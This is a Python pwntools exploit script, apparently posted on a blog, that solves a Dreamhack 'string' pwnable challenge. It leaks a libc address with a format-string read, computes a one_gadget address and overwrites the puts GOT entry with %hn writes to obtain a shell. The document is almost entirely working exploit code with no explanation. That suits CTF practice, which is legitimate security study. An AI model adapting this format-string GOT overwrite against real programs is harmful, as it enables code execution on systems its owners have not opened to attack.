.
#!/usr/bin/env python3
from pwn import *
import re
context.terminal = ['tmux', "splitw"]
# context.log_level = "debug"
e = ELF("./string")
HOST = "127.0.0.1"
PORT = 12345
#HOST = "host1.dreamhack.games"
#PORT = 23936
conn = process([e.path, e.path], env={"LD_PRELOAD":"./libc.so.6"})
#conn = remote(HOST, PORT)
fms = lambda value,offset: b"%"+bytes(str(value), encoding="utf8")+b"c"+b"%"+bytes(str(offset), encoding="utf8")+b"$hn"
libc_offset = 0x18637
one_gadget_offset = 0x3a812
conn.sendlineafter("> ", "1\n%71$p")
conn.sendlineafter("> ", "2")
#conn.recv() # only use on remote
libc_start_main = int(re.search(b"0[xX][0-9a-fA-F]+", conn.recv(timeout=0.5)).group(), 16)
#libc_start_main = int([conn.recv() for v0 in range(2)][1][:10], 16)
libc_addr = libc_start_main - libc_offset
one_gadget = libc_addr + one_gadget_offset
print(hex(libc_addr))
print(hex(one_gadget))
payload = b""
payload += p32(e.got["puts"]+2)
payload += p32(e.got["puts"]+0)
payload += fms(int((hex(one_gadget)[2:])[:4], 16)-8, 5)
payload += fms(int((hex(one_gadget)[2:])[:4], 16)-int((hex(one_gadget)[2:])[4:],16), 6)
conn.sendline("1")
conn.sendlineafter("Input: ", payload)
conn.sendlineafter(b"> ", "2")
gdb.attach(conn)
conn.interactive()
#pwnable
작성자 정보